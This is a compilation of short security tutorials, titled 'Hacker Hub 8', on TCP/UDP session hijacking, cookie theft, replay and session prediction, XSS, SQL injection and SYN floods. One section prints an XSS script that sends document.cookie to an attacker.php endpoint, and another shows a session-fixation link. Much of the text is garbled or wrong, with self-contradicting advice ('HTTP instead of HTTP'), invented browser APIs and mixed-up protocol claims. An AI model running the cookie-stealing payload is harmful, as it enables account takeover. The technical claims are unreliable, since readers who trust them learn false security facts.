Hacker Hub 8

 TCP/IP stands for Transmission Control Protocol/Internet Protocol. It is a communication protocol by which network devices interconnect on the internet and communicate with each other. The TCP protocol is used with an IP protocol, so both of them together are referred to as a TCP/IP. TCP/IP lies between the Application and Network Layers, which are used in providing reliable delivery service.

Working :

The TCP model breaks down sender messages or data into small packets and forwards them to the Internet Protocol (IP) layer. After the message is broken down into small packets, the packets are then sent through various routes to their destination. When one route is congested or cannot be used to reach the destination, then the packet arrives at the destination from multiple routes, but the destination remains the same during the process. When the packets arrive at their destination, they are reassembled into the original message or data, and the receiver receives the message or data. The TCP layer in the sender system waits for the end of the transfer and acknowledges when all packets are received. 

 

TCP/IP Hijacking:

TCP/IP hijacking is a man-in-the-middle network attack. This is a network attack where an authorized user can gain access to another user’s or client’s authorized network connection. After hijacking a TCP/IP session, an attacker is able to easily read and modify the transferred packets and the hacker is also able to send its own requests to the user. For TCP/IP hijacking, attackers use DOS attacks and IP spoofing.

TCP/IP Hijacking Process:

• The first major goal of an attacker is to obtain the IPs of two devices that communicate using the same network or connection. To do this, the attacker monitors the data transmission on the network until the IP of the device is obtained.
• After successfully grabbing the user IP. Hackers can easily attack the connection. 
• In order to gain access to the connection, the hacker put down the connection of another user through a DOS attack, and the user’s connection waits for reconnection.
• By spoofing the disconnected user’s IP, hackers can easily restore communication.

Preventive Measures:

• Do not click on unwanted or unknown links.
• Check the web application for all errors.
• Use an Intrusion Detection System (IDS) to monitor network traffic for unwanted or unknown activity and detect ARP spoofing/poisoning.
• Use a switch instead of a hub for increased security. 
• Always send the session ID over SSL for increasing security.
• Use a different number of session IDs for each page.
• Always use a secure protocol like HTTP instead of a plain text protocol like HTTP, until you don’t know which is right.

 UDS Packet is a low-level transport protocol used on LAN‘s and WAN‘s to send packets between two endpoints. UDP Session Hijacking is an attack where the attacker tricks the victim into using their computer as part of a botnet, typically by sending them unsolicited requests disguised as coming from legitimate sources. This illegitimate traffic can then be used to exploit vulnerable systems or steal data. UDP session hijacking is a method of compromising a computer session by manipulating the session’s Transmission Control Protocol (TCP) traffic. The attacker manipulates the data sent over the network, which can then be used to hijack the session or steal information.

There are a number of risks involved with using UDP session hijacking in ethical hacking. Firstly, UDP packets are not encrypted and are therefore easier to capture and manipulate. This makes it easier for the attacker to steal data or hijack the session. Additionally, the attacker has control over the data being sent, which means they can tamper with it in a number of ways. This could allow them to steal information or modify it in order to exploit the system.

 

UDP Hijacking Attacks: 

• One of the most powerful hackers will hijack a UDP broadcast. This allows them to steal data like passwords and credit cards. 
• The attacker, who can be someone nearby or halfway around the world, accesses the information by sending out a false reply to the victim’s communications request to an application that uses UDP as its transport protocol. 
• This is possible in Windows XP, Windows Vista, Windows 7, and Windows 8 operating systems.
• UDP packets are accepted by default on most versions of Microsoft operating system since XP. It is a default setting for anyone using an application on this operating system. Since these packets are not verified by the operating system, a hacker can send one reply to another legitimate user’s request. 
• This allows the hacker to receive any useful data like passwords and credit cards from the unsuspecting user. This is dangerous because no one notices anything unless the session gets degraded or broken because of a lack of response from the server.
• If firewall protection is in place, it will notify the user and block any unauthorized incoming packets.

A Scenario of UDP Session Hijacking:

• In UDP session hijacking, an attacker doesn’t need features like Transmission control protocol, for example, sequence numbers and ACK mechanism to do session hijacking.
• These attacks took place in the wild back at the beginning of 1995. In this attack, an attacker is concerned about the connection between terminals.

Examples of UDP Session Hijacking:

We can use netcat on Kali-Linux to perform UDP Session Hijacking.

Step 1: Open terminal on Kali Linux

Step 2: Type the following command to communicate with UDP Server.

nc -z -v -u [Localhost Address]  [ add UDP  port]

Output:

 

Basic Help Command:

 

Conclusion:

UDP hijacking is a new type of attack that can help malicious people steal valuable data from unsuspecting users. This is dangerous because it does not leave any trace or sign of the attack except for an unresponsive program. It is expected that this type of attack will become more known as the number of devices gets connected to the Internet and reach an expected 50 billion by 2020.

 Session Hijacking is a Hacking Technique. In this, the hackers (the one who perform hacking) gain the access of a target’s computer or online account and exploit the whole web session control mechanism. This is done by taking over an active TCP/IP communication session by performing illegal actions on a protected network. Normally, the web sessions are managed by the session token. The Session Hijacker has access over everything which the actual user has. For Example, shopping in an online store or paying your electricity bills, the session hijackers attack over web browsers or web application sessions.

 

Types of Session Hijacking:

Session Hijacking is of Three types: 

1. Active Session Hijacking : An Active Session Hijacking occurs when the attacker takes control over the active session. The actual user of the network becomes in offline mode, and the attacker acts as the authorized user. They can also take control over the communication between the client and the server. To cause an interrupt in the communication between client and server, the attackers send massive traffic to attack a valid session and cause a denial of service attack(DoS).
2. Passive Session Hijacking : In Passive Session Hijacking, instead of controlling the overall session of a network of targeted user, the attacker monitors the communication between a user and a server. The main motive of the hacker is to listen to all the data and record it for the future use. Basically, it steals the exchanged information and use for irrelevant activity. This is also a kind of man-in-middle attack (as the attacker is in between the client and the server exchanging information.  
3. Hybrid Hijacking : The combination of Active Session Hijacking and Passive Session Hijacking is referred to as Hybrid Hijacking. In this the attackers monitors the communication channel (the network traffic), whenever they find the issue, they take over the control on the web session and fulfill their malicious tasks.

To perform these all kinds of Session Hijacking attacks, the attackers use various methods. They have the choice to use a single method or more than one method simultaneously to perform Session Hijacking. Those methods are:

1. Brute-forcing the Session ID
2. Cross-Site Scripting (XSS) or Misdirected Trust
3. Man-in-the-browser
4. Malware infections
5. Session Fixation
6. Session side-jacking

These all Session Hijacking methods can be elaborated as:

1. Brute-forcing the Session ID : As the name suggests, the attack user uses guessing and trial method to find Session ID depending on its length.  This is due to lack of security and shorter length. The introduction of a strong and long session key made this method increase in a slow rate. 
2. Cross-Site Scripting (XSS) or Misdirected Trust :  In Cross-Site-Scripting, the attacker tries to find out the flaws and the weak point in the web server and injects its code into that. This activity of the attacker will help the attacker to find out the Session ID.
3. Man-in-the-browser : Man-in-the-browser uses a Trojan Horse (program that uses malicious code) to perform its required action. The attacker puts themselves in the communication channel of a server and a client. The main purpose of performing this attacks by the attacker is to cause financial fraud.
4.  Malware infections :  In Malware Infections, attacker can deceive the user to open a link that is a malware or Trojans program which will install the malicious software in the device. These are programmed to steal the browser cookies without the user’s knowledge. 
5. Session Fixation : Attackers create a duplicate or another disguised session in Session Fixation. It simply motivates or trick the user into authenticating the vulnerable server. This can be done by sending an email to the user, which on clicking directs to the attacker session.
6.  Session side-jacking : In Session side-jacking, the attackers tries to get access over a session using the network traffic. This becomes easy when the user is using an insecure Wi-Fi. The reading of network traffic and stealing of session cookie is done by packet sniffing. Packet Sniffing is a technique by which the data flowing across a network is observed. 

In spoofing hackers’ main goal is to win the trust of the target (Victim) by convincing him that they are interacting with a trusted source. After winning trust, hackers can easily enter the target system, spread the malicious code of the malware, and steal useful information such as passwords, PINs, etc., that the target stores in the system. In spoofing, the hacker’s main objective is to psychologically manipulate the target and win their trust.  For example, hackers create a clone of a banking website that completely appears to be legal but when the target enters sensitive information then the whole information is sent to the hacker, which the hacker can use for their own benefit or for other purposes.

 

In Hijacking, a hacker can take complete control of a target computer system or hijack a network connection. Once hijacked, the hacker can take control of the target user’s computer system and even easily read and modify the transmitted data or messages. In hijacking, the main goal of a hacker is to take control of a target computer system or network connection to steal information without getting known to the target that they are getting hacked or hijacked. For example, hackers take all the control of the target Computer System and use its camera to gather sensitive information and spy.

 

Difference Between Spoofing and Hijacking:

 Application-level hijacking is one of the most popular ways hackers use to steal information. The attacker will modify the traffic and information being sent to a trusted application, then pretend the traffic came from a legitimate user. This type of attack is done on vulnerable web applications that do not use SSL to encrypt data. For this technique to work, attackers must find a vulnerability in a system that gives them control over requests going through the proxy server or man-in-the-middle (MITM) attack.

Proxy Hacking:

Proxy hacking is a method used by attackers to exploit a program’s internal functions by sending control commands to the proxy server. The proxy server is a program that forwards requests made by applications, but only if they’re within a specific scope. These programs have access to all network traffic as well as other computers on the network. This makes it easier for an attacker to gain access and compromise an entire network. An attacker can monitor, edit, or intercept traffic from systems outside the scope of the application. This gives them the ability to capture user credentials, modify data or exploit vulnerabilities on systems such as web servers and database servers.

 

Scenario:

In this type of attack, the attacker uses a proxy server that has been hacked and connected to without the knowledge of the victim’s application. When an attacker is in place on the network and begins to monitor traffic, he can see where certain data is being sent to the website or server. The attacker then exploits this information by sending an HTTP request to modify or change data in some way.

Step 1: The attacker gathers information about the application or site from the target. This is done by using a proxy server to record all data going to and from the target site, including authentication details.

Step 2: Once an attacker gains access to a user’s details, he can then modify various parameters such as the user agent, user-name, password, session cookie ID or other important information that is sent to the server.

Step 3: In this step of the attack, an attacker will pretend to be a legitimate user and request a page on the application. The difference between the user-agent and the actual user-agent will be logged and sent to the attacker’s server.

Step 4: Using the obtained data, the attacker can now send a request through his proxy server. In this step, he’s telling the application that he is a legitimate user with a valid session and requesting information from its database.

Step 5: The attacker receives data as if he were a legitimate user because of the modified data that was sent in step 3. The data is sent to an element on his website or server, where it can be stored for future use or manipulated to obtain other sensitive information.

Conclusion: 

In this article, we learned about proxy hacking, an attack method used to exploit an application-level hijack. This can be done on applications that don’t use SSL and are vulnerable to man-in-the-middle attacks. By sending a request through an attacker’s proxy server which can modify data, the attacker is able to get information from the target site and network. The attacker gains access to sensitive data such as user information, passwords, and session cookies which are sent in plain text. Because of this vulnerability, it’s always important for organizations to ensure their servers are always patched up-to-date and using SSL encryption.

 Cyber security in today’s world is one of the biggest necessities of all time. It is important to safeguard the data that is present on the web. With the increasing demand for the internet and the services related to the internet, cyber crimes have become all the more common. 

It thus becomes important to protect the data and privacy of individuals, so that people using the internet feel safe while using the internet and related services. Crimes involving the internet also called cyber crimes have become all the more prevalent in modern times.

There are different types of cyber-attacks that are used by hackers to breach the privacy of individuals and harm/ steal their protected confidential data. One such cyber crime we will discuss in this article is the very risky ‘Man in the Browser Attack’.

Man in the Browser Attack:

• Man in the browser is a very dangerous cyber attack. Often it is regarded as another form of ‘Man in the Middle attack.
• Similar to the ‘Man in the middle Attack’ it involves eavesdropping taking place between two trusted sources. Here, eavesdropping is carried through a web browser. 
• The security vulnerabilities of the web browser thus are at risk as they are the target of attackers for data manipulation and stealing of confidential information. 
• Man in the Browser Attack is primarily opted by attackers for causing financial harm to users by making money frauds from the user bank account without the user knowing that he is becoming a victim of the Man in the Browser Attack.

How to Perform Man in the Browser Attack: 

• ‘Man in the Browser Attack’ is a form of a cyber attack involving a Trojan Horse that is mostly done for internet financial frauds or say transactions that are done using the internet.  
• A Trojan Horse attacks and manipulates the security calls involving banking transactions and financial frauds.
• Trojan Horse involved in the ‘Man in the Browser Attack’ are SpyEye, Zeus, and Clampi among others. 
• The Trojan horse can enter the system through dynamic load library, API, browser extensions, ajax worms, etc.
• Man in the browser attack is extremely risky as the mechanism of Man in the browser attack involves the Trojan Horse which attacks the internet transaction but still displays a successful transaction to the user. This makes it difficult for the user to know that he is been attacked.

Prevention from Man in the Browser Attack:

The different ways of preventing ‘Man in the browser attack’ are listed below: 

• The best way to prevent a ‘Man in the browser attack’ involves making use of the ‘Out of Band (OOB) Transaction verification’ mechanism. The ‘Out of Band (OOB) mechanism involves verifying the transactions by sending verification codes on mobile devices to authenticate the transaction.
• Refrain from downloading pirated software.
• Never click on unknown links received in the email.
• Make sure to have an updated version of anti-virus installed in your computer systems.
• Be vigilant to check the common Trojan locations. Trojan mostly resides in C:/Program File or C:/Windows/Temp.
• Always buy verified software for your computer system and keep them updated according to market needs.

 The browser treats cookies as DOM nodes, so it is possible to manipulate cookies through the DOM. This is commonly referred to as “DOM-based cookie manipulation”. The most common use of this technique is to delete or edit the value of a cookie. For example, deleting third-party cookies might allow somebody to bypass cross-site tracking issues by clearing a tracker’s identifier from their memory. Similarly, editing the value of a single-access token could be used to generate infinite new sessions on sites like Facebook.

DOM-based Cookie Manipulation:

While cookies are technically DOM nodes, accessing them through the DOM would be rather inconvenient. Fortunately, there is an API provided by nsICookieManager which returns a reference to nsICookieStorage, an interface that exposes a number of convenient methods for managing cookies. The following code demonstrates how to use this API to delete a cookie.

Note that while deleting a cookie may seem like an effective way to block cross-site tracking, in reality, the deleted cookie will simply be replaced with a brand new one. Using this API, cookies are deleted via two different methods. The first method, deleteTopCookie, delete the cookie in question from the memory of the user’s browser. The second method, deleteContainerCookie, delete a cookie from the specified storage object. For example, this code would be used to delete an Access Token cookie from storage.

One caveat about deleting cookies through the DOM is that cookies stored in memory persist until deleted manually. For this reason, deleting a cookie does not actually prevent it from being used on subsequent visits. This makes it imperative that users are careful not to leave any cookies lying around in plain text or HTML form fields after they have been deleted.

In addition to being able to edit or delete cookies through the DOM, it is possible to set new values for cookies. This can be accomplished by creating a new cookie, setting its attributes, and then storing it with the Add() method of nsICookieStorage. For example, this code sets a cookie named “test cookie”. Note that the value of a cookie should be treated just like any other HTTP header. It can be manipulated via JavaScript, sent via AJAX requests, and so on.

 

Countermeasures:

• It is important to note that the browser does not automatically delete cookies that have been set with the Add() method. If a user deletes their cookie with the DeleteTopCookie() method of nsICookieManager, the browser will simply delete the corresponding storage object. 
• Similarly, if a user deletes a cookie from within JavaScript, they will also need to clear it from storage (e.g., by calling DeleteContainerCookie().
• Be careful not to leave HTML form fields with cookies in them after form submission. 
• Cookies stored there can only be deleted through JavaScript. If a user’s browser supports “cookies”, these fields should be protected against editing via JavaScript. 
• Cookies with the HttpOnly attribute are inaccessible from JavaScript. 
• Thus, it is not possible to manipulate cookies like normal DOM nodes. 
• This can prevent some attacks like cross-site scripting (XSS). 
• For example, cookie-based XSS attacks almost always require JavaScript in order to set a cookie and then read the value of that cookie via the window. name. Without HttpOnly, these cookies could be used in cross-site request forgery (CSRF) attacks as well.
• Although HttpOnly cookies offer more protection from XSS, there is one exception. An attacker with access to the value of a cookie stored in storage via CORS can still perform cross-site scripting (XSS) attacks using it.

Key Points:

• For these reasons, this technique should not be considered an effective cross-site tracking blocker. Setting cookies is quite easy, especially when compared to the difficulty of storing them.
• Some browsers have implemented a database storage mechanism that helps mitigate the issues resulting from random cookie deletion. 
• For example, Firefox includes a “secure cookie” feature that encrypts cookies using a user-provided password and stores them in an encrypted SQLite database. Chrome has chosen not to include this feature at least initially and treats unencrypted cookies as HTTP headers just like any other browser.
• Cookie injection is a class of attack which occurs when a malicious script can modify or overwrite HTTP headers transmitted during client-server communication (Wikipedia: HTTP header injection).

Conclusion: 

This technique falls short of being an effective cross-site tracking blocker because it does not take into account a large number of mechanisms available for setting cookies. Currently, there are few extensions that block cross-site tracking by deleting cookies or clearing the browser’s local storage. Blocking third-party cookies is usually considered a good practice, as it theoretically prevents services from measuring the user’s web usage in order to provide more targeted advertisements. As a result, there are many extensions that enable users to block third-party cookies. Some of these extensions do this by deleting all third-party cookies.

An ethical hacker is able to use a session replay attack with the help of tools like Wireshark or Hping3. The hacker’s goal is to gain access to the network, data, and resources in order to fix any vulnerabilities that can be exploited by adversaries.

Session replay attacks, also known as replay or replay attacks, are network attacks that maliciously “retry” or “delay” valid data transmissions. Hackers can do this by intercepting the session and stealing the user’s unique session ID (stored as either a cookie, URL, or form field). The hacker can now impersonate the authorized user and have full access to do everything the authorized user can do on the website.

A replay attack occurs when a cybercriminal intercepts a secure network communication, intercepts it, and fraudulently delays or transmits it to trick the recipient into doing what the hacker wants. The additional risk of replay attacks is that hackers don’t even need advanced skills to decrypt messages after capturing them from the network. The attack can be successful simply by resending everything.

 

Session Replay Attacks:

A session replay attack is an active intrusion technique where the attacker records and replays a victim’s internet session as if they were an authorized user, thus obtaining credentials for accessing confidential information. 

Session Replay Attacks:

A session replay attack is an active intrusion technique where the attacker records and replays a victim’s internet session as if they were an authorized user, thus obtaining credentials for accessing confidential information. 

• Your account settings may be hacked without your knowledge if your password can be phished or guessed by brute force.
• The hacker can get access to your network remotely by using tools like BFD, Nmap, or Pivot. 
• The attacker’s goal is to gain access to your data by intruding into your system and stealing sensitive information.

Key Points:

• It may be easy for the attacker to know if you are offline or not as they can detect where you are connected from.
• All the data that the session replay attack captures, is saved and saved in a format that is easily identified by the hacker, allowing them to take control of the network remotely.
• The method depends on the type of session replay attack that the hacker is using to hack your account.
• There are many ways for doing a session replay attack.
• To start, the first step that you need to do is find out the IP address of your computer, you can use NMAP (Network Mapper).
• After that, you need to go to your network settings and port forward. 

Working:

An attacker can intercept this message, intercept it, and resend it. Since this is just a genuine message that was resent, the message is already properly encrypted and looks legitimate to financial managers. In this scenario, the money manager may respond to this new request unless there is a suspicious reason. This response could consist of sending a large amount of money to the attacker’s bank account.

Example:

The web application holds the session in a query parameter:

A web application can manage a user’s session based on the value of a query parameter, 

http://example.com/home/show.php?SESSIONID=MYSESSION,
where MYSESSION is the Session ID. 

This method is vulnerable to a session-specific replay attack, known as a session fixation attack.

• The attacker generates his own session ID.
• The attacker sends a URL with his session ID to a valid application user.

Eg: http://example.com/home/show.php?SESSIONID=ATTACKER-SESSION

• When a valid user clicks the link, a session will be started with the session ID, ATTACKER_SESSION. 
• A valid user connects to the application using his credentials. 
• An attacker can now impersonate a valid user by visiting.

http://example.com/home/show.php?SESSIONID=ATTACKER-SESSION

Countermeasures: 

• You also need to make sure that a malicious program like Wireshark or Hping3 can capture your traffic and replay it back in your connection.
• There are plugins on Wireshark that help you monitor traffic while also recording and replaying it in real-time into Hping3. You can find out more about this plugin on Wireshark’s website.
• This type of attack is called a passive session replay (PSR) and it logs all the traffic that the hacker is accessing on the network.
• The Wireshark program records and replays all your traffic for you, allowing you to see what everyone is doing and where they are located.
• The Hping3 program allows you to monitor as well as replay your traffic and also captures files that may have been transferred across your connection, including passwords, hash values, and cookies. 

 Cookie Hijacking is a method by which webmasters break into other websites to steal cookies. This allows them to watch the victim’s browsing activity, log their keystrokes, gain access to credit card information and passwords, and more. Cookie hijacking attacks mainly involve injecting JavaScript code into a website by embedding it in the HTML of an otherwise authentic-looking email or advertisement. This malicious code is then executed by the browser when you visit the infected site; it will display an endless series of popups that may be used for phishing purposes to steal your login credentials or other sensitive information. Some sites have also been modified so that they take cookie data from visitors without requiring them to provide their login credentials first.

 

As the name indicates, this attack is a hijack of cookies. Cookies are small text files that are created by the server and sent to the client with each page request. The main purpose of cookies is to make browsing easier for you by providing various types of information to websites such as your name, address, and search preferences so that they can customize your browsing experience based on your past visits. For example, Gmail will fill in certain suggestions automatically as soon as you start typing in a new message, without requiring you to dig through the Edit menu again and again.

Key Points: 

• Many popular websites have been affected by cookie hijacking. For instance, Flickr has been hit by a script that steals users’ passwords and sends them to an attacker’s email address.
• This type of attack occurs when the attacker embeds malicious JavaScript code into an otherwise authentic-looking email or advertisement. 
• This malicious code is then executed by the victim’s browser when they visit the infected site; it will display an endless series of popups that may be used for phishing purposes to steal your login credentials or other sensitive information. 
• In addition, some sites have also been modified so that they harvest cookie data from unsuspecting visitors without requiring them to provide their login credentials first.

Advantages: 

• Cookie hijacking is a stealthy attack. It can take place without the victim knowing anything about it because the browser will send cookies automatically to any website the user navigates to. Most computer users do not realize the importance of protecting their cookies, which is why they often fall victim to such attacks.
• Cookie hijacking attacks are hard to detect because they use seemingly authentic-looking emails or advertisements with malicious code embedded in them to spread from one user to another over time. There is no need for a hacker’s malicious server; these attacks can be carried out entirely by leveraging popular websites and email servers that people use daily for legitimate purposes as well.
• In certain cases, the attacker can do more than just steal your login credentials or other sensitive information. He can also install malicious software on your computer, make you interact with phishing sites that may attack you with ransomware, or even make you visit phony pornographic websites and more.
• Cookie hijacking is hard to detect because the user cannot be certain that they were visiting a legitimate website before any popups started appearing on their screen. Malicious JavaScript code can fool the user into thinking it was a legitimate message from one of his favorite websites that he visited earlier without realizing his cookies were hijacked at that time and sending the data from somewhere else.

Conclusion: 

Cookie hijacking is a serious threat that is often left unnoticed. If you are worried about such attacks on your computer, consider installing anti-malware software or activating the “Do Not Track” feature in your browser that protects you from cookie hijacking attacks. 

 Session prediction attacks focus on predicting session ID values ​​that allow an attacker to bypass the application’s authentication scheme. By analyzing and understanding the session ID generation process, an attacker could predict a valid session ID value and gain access to the application. The attacker needs to collect some valid session ID values ​​that are used to identify the authenticated user. Next, you need to understand the structure of the session ID, the information used to create the session ID, and the encryption or hash algorithm used by the application to protect the session ID. Some improper implementations use a username or session ID consisting of other predictable information such as timestamps and client IP addresses. In the worst case, this information is used in plain text or encoded with a weak algorithm, such as Base64 encoding.

 

Session prediction is impossible without the help of the session ID cookie. Session cookies are used by websites to maintain a session with you. Session prediction is used by hackers to predict the next session and is used for malicious purposes. There are three ways in which a hacker can perform an attack:

• Social Engineering: There are several ways hackers can play social engineering and use deception to trick you. They will tell you that your PC is infected with a virus and will ask you to install their software so that they can repair your computer. It also sends fake emails and messages on Facebook, makes phone calls to let you know that your system has been attacked by a virus, and sends attachments such as malware.
• Spoofing: Spoofing is a technique that allows a hacker to use another visitor’s IP address to access a website and launch an attack. The only way to protect yourself from such attacks is to verify your IP address before visiting a website.
• Session Prediction: This session prediction attack is used by hackers to use session ID cookies to access servers and perform malicious activities.

Working of Session Prediction Software Attack:

• Session prediction and hijacking usually occur when legitimate users are interacting with the affected website. 
• Depending on the level of technical knowledge and the nature of the attack, legitimate users may or may not be able to detect the intrusion. 
• Session predictions or hijacking can occur if a website does not respond to user input normally or as expected, or if it stops responding at all for unknown reasons.

 Countermeasures:

• Use HTTPS: Make sure you need to use HTTPS everywhere on your web servers and applications, especially SSO systems. In addition, all internet communications must be encrypted to protect the session at all stages. 
• Install the framework: Web frameworks can generate longer and more random session cookies, which simplifies session management.
• Rotate session key after authentication: Changing the session key after a successful login makes it difficult for the session hijacker to track the user’s session, even if they know the original key. With such a setting, the attacker would not be able to hijack the session using the self-generated key, even if the attacker sent a phishing link that the user clicked.

 What is Session Hijacking?

TCP session hijacking is a security attack on a user session over a protected network. The most common method of session hijacking is called IP spoofing, when an attacker uses source-routed IP packets to insert commands into an active communication between two nodes on a network and disguise itself as one of the authenticated users. This type of attack is possible because authentication typically is only done at the start of a TCP session.

Another type of session hijacking is known as a man-in-the-middle attack, where the attacker, using a sniffer, can observe the communication between devices and collect the data that is transmitted.

Different ways of session hijacking :

There are many ways to do Session Hijacking. Some of them are given below –

• 
  

  In the above figure, it can be seen that attack captures the victim’s session ID to gain access to the server by using some packet sniffers.

• Cross Site Scripting(XSS Attack)
  Attacker can also capture victim’s Session ID using XSS attack by using javascript. If an attacker sends a crafted link to the victim with the malicious JavaScript, when the victim clicks on the link, the JavaScript will run and complete the instructions made by the attacker.

  <SCRIPT type="text/javascript"> var adr = '../attacker.php?victim_cookie=' + escape(document.cookie); </SCRIPT>

  
  
• IP Spoofing
  Spoofing is pretending to be someone else. This is a technique used to gain unauthorized access to the computer with an IP address of a trusted host. In implementing this technique, attacker has to obtain the IP address of the client and inject his own packets spoofed with the IP address of client into the TCP session, so as to fool the server that it is communicating with the victim i.e. the original host.
• Blind Attack
  If attacker is not able to sniff packets and guess the correct sequence number expected by server, brute force combinations of sequence number can be tried.

Mitigation

To defend a network with session hijacking, a defender has to implement both security measures at Application level and Network level. Network level hijacks can be prevented by Ciphering the packets so that the hijacker cannot decipher the packet headers, to obtain any information which will aid in spoofing. This encryption can be provided by using protocols such as IPSEC, SSL, SSH etc. Internet security protocol (IPSEC) has the ability to encrypt the packet on some shared key between the two parties involved in communication. IPsec runs in two modes: Transport and Tunnel.
In Transport Mode only the data sent in the packet is encrypted while in Tunnel Mode both packet headers and data are encrypted, so it is more restrictive.

Session hijacking is a serious threat to Networks and Web applications on web as most of the systems are vulnerable to it.

Sources;

• https://www.owasp.org/index.php/Session_hijacking_attack
• https://en.wikipedia.org/wiki/Session_hijacking
• http://www.infosecwriters.com/text_resources/pdf/SKapoor_SessionHijacking.pdf
• https://www.owasp.org/images/c/cb/Session_Hijacking_3.JPG
• https://www.owasp.org/images/b/b6/Code_Injection.JPG

 A client-side attack is a security breach that happens on the client side. Examples include installing malware on your device or banking credentials being stolen by third-party sites. A common client-side attack is a denial of service attack, which floods a system with requests and prevents it from functioning properly. For example, if you tried to log into your bank’s website using an out-of-date browser and plugin, you would be denied access. Another common client-side attack is data manipulation, for example, changing your bank balance without your permission. On the other hand, a security breach on the client side should be prevented by using positive client-side security measures such as multifactor authentication and encryption. Ideally, computers should only be connected to trusted networks and devices with proper security patches installed. Client-side attacks are harder to prevent since they require access to your device, but can be mitigated by taking appropriate steps beforehand.

 

Types of Client-Side Attacks: 

• Content Spoofing: Content Spoofing is one of the common web security vulnerabilities. It allows the end user of the vulnerable web application to spoof or modify the actual content on the web page. The user might use the security loopholes on the website to inject the content that he/she wishes into the target website. When an application does not properly handle user-supplied data, an attacker can supply content to a web application, typically via a parameter value, that is reflected back to the user.
• Cross-site scripting: In this type of attack, an attacker injects malicious codes into websites that are typically downloaded and displayed by a vulnerable browser. Cross-site scripting (XSS) is a computer security vulnerability typically found in web applications that enable attackers to inject client-side script into web pages viewed by other users.
• Session Fixation Attack: A session fixation attack is a type of remote code execution attack which is used to exploit software designed with the web-server Session Management feature. When a website is running an HTTP server, the server’s session state information can be stolen and then retrieved by an attacker to take over the browser or use it for further attacks. There are many tools that can help you detect session fixation attacks in your organization in order to prevent future attacks. A Session fixation attack is also known as Session Fixation Vulnerability (SFV).

Detection:

The best way to mitigate client-side attacks is through system patching. System patching is the most basic and cost-effective method to lower the attack surface. It is important to keep up with patches and avoid vendor updates that patch vulnerabilities in software that are not relevant to the overall corporate environment. The best way to prevent client-side attacks is through a secure, strong password policy that dictates common passwords or patterns of many modern authentication technologies, including NTLM, MD4, DIGEST-MD5, and SHA1.

Countermeasures: 

Steps to take to prevent client-side attacks.

• Install antivirus software, anti-spyware software, and firewall protection on all workstations, servers, and wireless devices.
• Ensure the latest system software patches are applied regularly.
• Maintain a complete backup system of all data on all systems use a separate server or external hard drive or network location to store backups that are no longer needed and keep them off the system they were created on.
• If a user is logging in from an unknown location or IP address, consider blocking access from those locations (access control lists).
• Prevent unauthorized access to accounts.
• Use strong passwords and avoid common passwords or patterns that can lead to vulnerabilities, like “Admin” or “12345”.
• Limit login attempts (user lockout).

 Cyber security has become an essential part of the digital world due to the rise in malicious attackers. Cyber security ensures to the protection of data, and systems from cyber attacks like Denial of Service attacks, Ransomware attacks, Virus attacks, etc. These attacks are possible by finding vulnerabilities in the system, network, or any software. Different types of vulnerabilities can be found in any software or system if proper security measures were not taken so we will compare the two most common vulnerabilities which are XSS and SQL Injection to understand the problem and their mitigation.

What is Cross-site Scripting(XSS)?

XSS (Cross-site scripting) can be understood as a web vulnerability that allows attackers to insert malicious JavaScript code into webpages of a vulnerable website. Once the client-side scripts are injected then the attacker can do many unethical tasks like stealing cookies, changing default settings, showing different types of popups, etc. With an XSS attack, an attacker can change the content of the website to defame it or redirect users to other websites.

Mitigation Techniques

• Each and every developer must be aware of the XSS attacks and proper training should be given before doing development work.
• Only allow trusted users’ input and set permissions for any external input through HTML.
• Use escaping libraries for using user’s input like CSS escape, URL escape, HTML escape, etc.
• To prevent cookie stealing, set the HttpOnly flag.
• Use a security scanner on regular basis for checking any new vulnerabilities.

What is SQL Injection?

SQL Injection can be understood as an attacking technique that uses SQL statements to interact with the database and make it behave abnormally. SQL statements can be injected using various fields like URLs, HTML form fields, cookies, etc. An attacker can insert malicious statements into input fields of a login form to query a database, if injected successfully then it can result in the compromise of the complete database with all the sensitive information like usernames, passwords, etc.

Mitigation Techniques

•  Sanitize user input using an extra layer and check against common SQL syntax.
• Instead of raw data input, use dropdowns or checklists for input and set input character limit.
• Try to use parameterized statements and stored procedures whenever possible.
• Scan and update applications at regular intervals.
• Always use a firewall especially a web application firewall to make websites and web applications less vulnerable.

Following is a table of differences between XSS and SQL Injection:

Conclusion/Summary

In the above comparison, we found that both vulnerabilities are of high risk if found in any website or web application. It can lead to the compromise of users’ data along with sensitive information like bank accounts or health information. Hence developers must have knowledge of these vulnerabilities and implement the techniques to mitigate the attacks.

 Before talking about SYN cookies and how they are used to preventing SYN Flood attack, Let us first take a look at how TCP connections were established until  mid-1990s.

How TCP Connection Are Established:
A TCB(Transmission Control Block) is created when a TCP entity opens a TCP connection, A TCB contains  whole state of connection. The state of the connection contains:

1. Local sequence number.
2. Sequence number sent by the remote client.

Until the mid-1990s, To avoid overflowing the entity’s memory with TCBs there was a limit on the number of ‘half-open’ TCP connections (TCP connections in the SYN RCVD state) which was most commonly at 100. So, a server could only have 100 ‘half-open’ TCP connections. The TCP entity would stop accepting any new SYN segments when limit was reached.

A TCP implementation must maintain a Transmission Control Block (TCB) for every established TCP connection. A TCB must contain all information required to send and receive segments. They are as follows:

1. Local IP address.
2. Remote IP address.
3. Local TCP port number.
4. Remote TCP port number.
5. Current state of the TCP FSM.
6. Maximum segment size (MSS).

The following diagrams show the TCP connection process:

STEP 1:  Client sends an SYN connection request to server 

Initially, the Client sends an SYN connection request

STEP 2: Server sends an SYN connection request and an acknowledgement to client

The server sends an SYN connection request and an acknowledgement

STEP 3:  Client sends an acknowledgement to server

The client sends an acknowledgement

SYN Flood Attack:
An SYN flood attack is a type of denial-of-service attack during which an attacker rapidly initiates a TCP connection with an SYN request to a server and does not respond to SYN+ACK from the server. The server has to spend resources (Creating TCBs for the connection requests) waiting for half-opened connections Since there was a limit on the number of ‘half-open’ TCP connections. The server will no longer accept any new connections. This will make system unresponsive to legitimate traffic. The following steps show how it was carried out.

1. Attacker would send 100s of SYN segments every second to a server.
2. Attacker would not reply to any received SYN+ACK segments.
3. Attacker would send these SYN segments with a different IP address from their own IP address to avoid being caught.
4. Once a server entered the SYN RCVD state, it would remain in that state for several seconds, waiting for an ACK and not accepting any new, possibly genuine connections, thus being rendered unavailable.

Here are some diagrams depicting an SYN flood attack:

STEP 1:  Client sends an SYN connection request to server 

Initially, the Client sends an SYN connection request

STEP 2: Server sends an SYN connection request and an acknowledgement to the client

The server sends an SYN connection request and an acknowledgement

STEP 3:  Client does not respond with an ACK to complete three-way handshake

The client does not respond with an ACK

STEP 4: Attacker creates 100 other half-open connections from various IP addresses

